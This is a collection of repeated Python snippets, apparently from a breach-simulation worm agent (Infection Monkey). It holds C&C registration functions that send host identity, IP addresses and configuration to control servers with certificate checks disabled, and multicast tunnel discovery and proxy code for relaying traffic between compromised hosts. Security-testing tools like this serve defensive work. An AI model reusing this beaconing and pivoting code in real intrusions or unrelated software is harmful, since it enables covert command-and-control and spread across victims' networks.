def wakeup(parent=None, has_internet_access=None): if parent: LOG.debug("parent: %s" % (parent, )) hostname = gethostname() if not parent: parent = GUID if has_internet_access is None: has_internet_access = check_internet_access( WormConfiguration.internet_services) monkey = { 'guid': GUID, 'hostname': hostname, 'ip_addresses': local_ips(), 'description': " ".join(platform.uname()), 'internet_access': has_internet_access, 'config': WormConfiguration.as_dict(), 'parent': parent } if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') requests.post("https://%s/api/monkey" % (WormConfiguration.current_server, ), data=json.dumps(monkey), headers={'content-type': 'application/json'}, verify=False, proxies=ControlClient.proxies, timeout=20)
def wakeup(parent=None, has_internet_access=None): if parent: LOG.debug("parent: %s" % (parent,)) hostname = gethostname() if not parent: parent = GUID if has_internet_access is None: has_internet_access = check_internet_access(WormConfiguration.internet_services) monkey = {'guid': GUID, 'hostname': hostname, 'ip_addresses': local_ips(), 'description': " ".join(platform.uname()), 'internet_access': has_internet_access, 'config': WormConfiguration.as_dict(), 'parent': parent} if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), data=json.dumps(monkey), headers={'content-type': 'application/json'}, verify=False, proxies=ControlClient.proxies, timeout=20)
def set_tunnel_for_host(self, host): assert isinstance(host, VictimHost) if not self.local_port: return ip_match = get_close_matches(host.ip_addr, local_ips()) or self.l_ips host.default_tunnel = '%s:%d' % (ip_match[0], self.local_port)
def run(self): self._broad_sock = _set_multicast_socket(self._timeout) self.l_ips = local_ips() self.local_port = get_free_tcp_port() if not self.local_port: return if not firewall.listen_allowed(localport=self.local_port): LOG.info("Machine firewalled, listen not allowed, not running tunnel.") return proxy = self._proxy_class(local_port=self.local_port, dest_host=self._target_addr, dest_port=self._target_port) LOG.info("Running tunnel using proxy class: %s, listening on port %s, routing to: %s:%s", proxy.__class__.__name__, self.local_port, self._target_addr, self._target_port) proxy.start() while not self._stopped: try: search, address = self._broad_sock.recvfrom(BUFFER_READ) if '?' == search: ip_match = get_close_matches(address[0], self.l_ips) or self.l_ips if ip_match: answer = '%s:%d' % (ip_match[0], self.local_port) LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer) self._broad_sock.sendto(answer, (address[0], MCAST_PORT)) elif '+' == search: if not address[0] in self._clients: LOG.debug("Tunnel control: Added %s to watchlist", address[0]) self._clients.append(address[0]) elif '-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: continue LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients)) # wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT): try: search, address = self._broad_sock.recvfrom(BUFFER_READ) if '-' == search: LOG.debug("Tunnel control: Removed %s from watchlist", address[0]) self._clients = [client for client in self._clients if client != address[0]] except socket.timeout: continue LOG.info("Closing tunnel") self._broad_sock.close() proxy.stop() proxy.join()
def wakeup(parent=None, default_tunnel=None, has_internet_access=None): LOG.debug("Trying to wake up with C&C servers list: %r" % WormConfiguration.command_servers) if parent or default_tunnel: LOG.debug("parent: %s, default_tunnel: %s" % (parent, default_tunnel)) hostname = gethostname() if not parent: parent = GUID if has_internet_access is None: has_internet_access = check_internet_access(WormConfiguration.internet_services) for server in WormConfiguration.command_servers: try: WormConfiguration.current_server = server monkey = {'guid': GUID, 'hostname': hostname, 'ip_addresses': local_ips(), 'description': " ".join(platform.uname()), 'internet_access': has_internet_access, 'config': WormConfiguration.as_dict(), 'parent': parent} if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') debug_message = "Trying to connect to server: %s" % server if ControlClient.proxies: debug_message += " through proxies: %s" % ControlClient.proxies LOG.debug(debug_message) reply = requests.post("https://%s/api/monkey" % (server,), data=json.dumps(monkey), headers={'content-type': 'application/json'}, verify=False, proxies=ControlClient.proxies, timeout=20) break except Exception as exc: WormConfiguration.current_server = "" LOG.warn("Error connecting to control server %s: %s", server, exc) if not WormConfiguration.current_server: if not ControlClient.proxies: LOG.info("Starting tunnel lookup...") proxy_find = tunnel.find_tunnel(default=default_tunnel) if proxy_find: proxy_address, proxy_port = proxy_find LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port)) ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port) ControlClient.wakeup(parent=parent, has_internet_access=has_internet_access) else: LOG.info("No tunnel found")
def wakeup(parent=None, default_tunnel=None, has_internet_access=None): LOG.debug("Trying to wake up with C&C servers list: %r" % WormConfiguration.command_servers) if parent or default_tunnel: LOG.debug("parent: %s, default_tunnel: %s" % (parent, default_tunnel)) hostname = gethostname() if not parent: parent = GUID if has_internet_access is None: has_internet_access = check_internet_access( WormConfiguration.internet_services) for server in WormConfiguration.command_servers: try: WormConfiguration.current_server = server monkey = { 'guid': GUID, 'hostname': hostname, 'ip_addresses': local_ips(), 'description': " ".join(platform.uname()), 'internet_access': has_internet_access, 'config': WormConfiguration.as_dict(), 'parent': parent } if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') debug_message = "Trying to connect to server: %s" % server if ControlClient.proxies: debug_message += " through proxies: %s" % ControlClient.proxies LOG.debug(debug_message) reply = requests.post( "https://%s/api/monkey" % (server, ), data=json.dumps(monkey), headers={'content-type': 'application/json'}, verify=False, proxies=ControlClient.proxies, timeout=20) break except Exception, exc: WormConfiguration.current_server = "" LOG.warn("Error connecting to control server %s: %s", server, exc)
def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): l_ips = local_ips() if default: if default.find(':') != -1: address, port = default.split(':', 1) if _check_tunnel(address, port): return address, port for adapter in l_ips: for attempt in range(0, attempts): try: LOG.info("Trying to find using adapter %s", adapter) sock = _set_multicast_socket(timeout, adapter) sock.sendto("?", (MCAST_GROUP, MCAST_PORT)) tunnels = [] while True: try: answer, address = sock.recvfrom(BUFFER_READ) if answer not in ['?', '+', '-']: tunnels.append(answer) except socket.timeout: break for tunnel in tunnels: if tunnel.find(':') != -1: address, port = tunnel.split(':', 1) if address in l_ips: continue if _check_tunnel(address, port, sock): sock.close() return address, port except Exception as exc: LOG.debug("Caught exception in tunnel lookup: %s", exc) continue return None
def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT): l_ips = local_ips() for adapter in l_ips: for attempt in range(0, attempts): try: LOG.info("Trying to find using adapter %s", adapter) sock = _set_multicast_socket(timeout, adapter) sock.sendto("?", (MCAST_GROUP, MCAST_PORT)) tunnels = [] if default: tunnels.append(default) while True: try: answer, address = sock.recvfrom(BUFFER_READ) if answer not in ['?', '+', '-']: tunnels.append(answer) except socket.timeout: break for tunnel in tunnels: if tunnel.find(':') != -1: address, port = tunnel.split(':', 1) if address in l_ips: continue LOG.debug("Checking tunnel %s:%s", address, port) is_open, _ = check_port_tcp(address, int(port)) if not is_open: LOG.debug("Could not connect to %s:%s", address, port) continue sock.sendto("+", (address, MCAST_PORT)) sock.close() return address, port except Exception, exc: LOG.debug("Caught exception in tunnel lookup: %s", exc) continue
def wakeup(parent=None, default_tunnel=None): LOG.debug("Trying to wake up with C&C servers list: %r" % WormConfiguration.command_servers) if parent or default_tunnel: LOG.debug("parent: %s, default_tunnel: %s" % (parent, default_tunnel)) hostname = gethostname() if not parent: parent = GUID for server in WormConfiguration.command_servers: try: WormConfiguration.current_server = server monkey = {'guid': GUID, 'hostname': hostname, 'ip_addresses': local_ips(), 'description': " ".join(platform.uname()), 'internet_access': check_internet_access(WormConfiguration.internet_services), 'config': WormConfiguration.as_dict(), 'parent': parent} if ControlClient.proxies: monkey['tunnel'] = ControlClient.proxies.get('https') debug_message = "Trying to connect to server: %s" % server if ControlClient.proxies: debug_message += " through proxies: %s" % ControlClient.proxies LOG.debug(debug_message) reply = requests.post("https://%s/api/monkey" % (server,), data=json.dumps(monkey), headers={'content-type': 'application/json'}, verify=False, proxies=ControlClient.proxies, timeout=20) break except Exception, exc: WormConfiguration.current_server = "" LOG.warn("Error connecting to control server %s: %s", server, exc)